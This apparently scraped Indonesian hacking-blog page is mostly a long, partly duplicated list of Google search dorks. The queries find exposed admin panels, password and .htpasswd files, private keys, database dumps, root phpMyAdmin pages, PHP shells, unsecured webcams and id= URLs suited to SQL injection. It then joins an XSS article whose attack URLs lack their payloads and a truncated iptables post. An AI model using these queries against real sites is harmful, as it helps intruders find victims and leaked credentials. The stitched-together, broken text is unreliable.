inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets

"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The script whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
": vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp
+ View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"

Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache

"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The s?ri?t whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"
"Duclassified" -site:duware.com "DUware All Rights reserved"
"duclassmate" -site:duware.com
"Dudirectory" -site:duware.com
"dudownload" -site:duware.com
"Elite Forum Version *.*"
"Link Department"
"sets mode: +k"
"your password is" filetype:log
"DUpaypal" -site:duware.com

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

inurl:comersus.mdb
inurl:/database/comersus.mdb
inurl:comersus_dynamicIndex.asp
allinurl:store/index.cgi/page=
defaultpassword
inurl:/midicart.mdb
allinurl:/midicart/shop/
allinurl:admin/file_manager.php
inurl:cgi-bin/web_store.cgi?
allinurl:/vpasp/shopsearch.asp
inurl:shopdbtest.asp
allinurl:/shop/category.asp/catid=
inurl:showcart.asp
allinurl:/DCShop/
allinurl:auth_user_file.txt
intitle:"Samba Web Administration Tool"intext:"Help Workgroup"
inurl:rpSys.html
login:*""password:*"filetype:xls
intitle:administrator page"Logout
"Powered by PHPFM"filetype:php-username
PHPKonsolePHPShell filetype:php-echo
intitle:"PHPShell*Enablestderr"filetype:php
inurl:polly/cp
inurl:php inurl:hlstats intext:"Server Username"
inurl:server.cfg rcon password
inurl:set_preferences.asp
inurl:send_password_preferences.asp

Sumber

XSS & Penanggulangan XSS

2010-10-26T18:35:00.000-07:00

Sebuah aplikasi web rentan terhadap XSS memperbolehkan user tanpa pengetahuan untuk mengirimkan data jahat kepada diri mereka melalui aplikasi tersebut.
penyerang sering melakukan eksploitasi XSS dengan membuat URL jahat dan menipu ke mengklik pada mereka.

ini menyebabkan link sisi client bahasa scripting seperti VBScript, JavaScript dari pilihan penyerang untuk mengeksekusi pada korban browser.
kerentanan XSS disebabkan oleh kegagalan dalam aplikasi web untuk benar memvalidasi input pengguna.
Gambaran sederhana dari cross-site scripting dapat diletakkan sebagai serangan yang terjadi saat pengguna memasukkan data berbahaya dalam situs Web. Hal ini dapat sesederhana posting pesan yang berisi kode berbahaya ke sebuah newsgroup. Ketika orang lain pandangan pesan ini, browser akan menginterprestasikan kode dan menjalankan file ini, sering memberikan kontrol penyerang dalam sistem. Skrip berbahaya juga dapat di jalankan secara otomatis berdasarkan pada peristiwa tertentu, seperti ketika beban gambar. CSS tudaj berlaku untuk produk vendor tunggal apapun, sebaliknya, hal itu dapat mempengaruhi setiap perangkat lunak yang berjalan pada server web.
CSS terjadi sebagai akibat dari kegagalan berbasis aplikasi web yang disediakan untuk memvalidasi input pengguna sebelum mengembalikannya ke sistem klien. "Cross-Site" mengacu pada pembatasan keamanan bahwa browser client biasanya tempat di data seperti cookies, konten dinamis atribut yang berhubungan dengan situs web. Hal ini menyebabkan korban browser untuk mengeksekusi kode berbahaya dengan hak akses yang sama dengan domain dari aplikasi web, penyerang bisa melewati model dokument tradisional objek (DOM) pembatasan keamanan. Model obyek dokumen adalah interface dapat diakses aplikasi yang memungkinkan sisi klien bahasa untuk secara dinamis mengakses dan memodifikasi konten, struktru dan gaya dari suatu halaman web.
Cross-site Scripting (CSS) serangan memerlukan pelaksanaan-side Bahasa Client (JavaScript, Java, VBScript, ActiveX, Flash) dalam web lingkungan pengguna. Cross Site Scripting dapat mengakibatkan penyerang mencuri cookie, pembajakan sesi, mengubah pengaturan akun aplikasi web dan banyak lagi. Komponen web yang paling umum yang rentan terhadap serangan CSS termasuk script CGI, mesin pencari, papan buletin interaktrif (Forum), dan halaman kesalahan kuctom dengan input validasi tertulis rutinitas buruk. Juga korban tidak perlu untuk mengklik pada link untuk membuat serangan terjadi.
(Contoh Attack)
Contoh 1: Tag IMG
http://host/search/search.cgi?query=
TErgantung pada pengaturan webiste, ini menghasilkan html dengan gambar dari host2 dan feed itu kepada pengguna ketika mereka mengklik link ini. Tergantung pada tata letak halaman web asli dimungkinkan untuk menarik pengguna ke dalam pemikiran ini adalah bagian sah dari gambar.
contoh 2 :
http://host/something.php?q=
Jika pengguna mengklik link ini menampilkan kotak popup JavaScript domain nama situs akan muncul. Meskipun contoh ini tidak berbahaya, penyerang dapat menciptakan bentuk palsu atau, mungkin menciptkan sesuatu yang mengambil informasi dari pengguna. Permintaan atas adalah mudah dipertanyakan kepada pengguna standart tapi dengan hex, unicode, atau pengkodean jendela pengguna bisa tertipu dan berpikir ini adalah link situs valid.
Contoh 3 :
http://host/inserthere

iptales-save dan iptables-restore

2010-10-25T20:43:00.001-07:00

hmmm ane coba share beberapa info yg ane dapat dri om kiddies nih ...moga2 berguna :D

author : kiddies A.k.A peneter

email : -

blog : http://devil-kiddies.blogspot.com/

http://kiddiescode.wordpress.com/

website : http://devilzc0de.org/

[iptable-save]

iptables-save adalah perintah yang digunakan untuk penyimpan seetingan iptables

command:

iptables-save [-C] [-t table]

-C : argumen ini dapat digunakan untuk menjaga nilai dalam pehitungan byte dan paket, sangat berguna untuk kasus ketika kita me-reboot firewall agar counter byte paket tetap terjaga keadaannya

-t : argumen ini untuk menyimpan table yang ada. sebenernya tanpa [-t] pun table-table yang ada sudah tersimpan secara otomatis

berikut adalah perintah ketika perintah tersebut dijalankan:

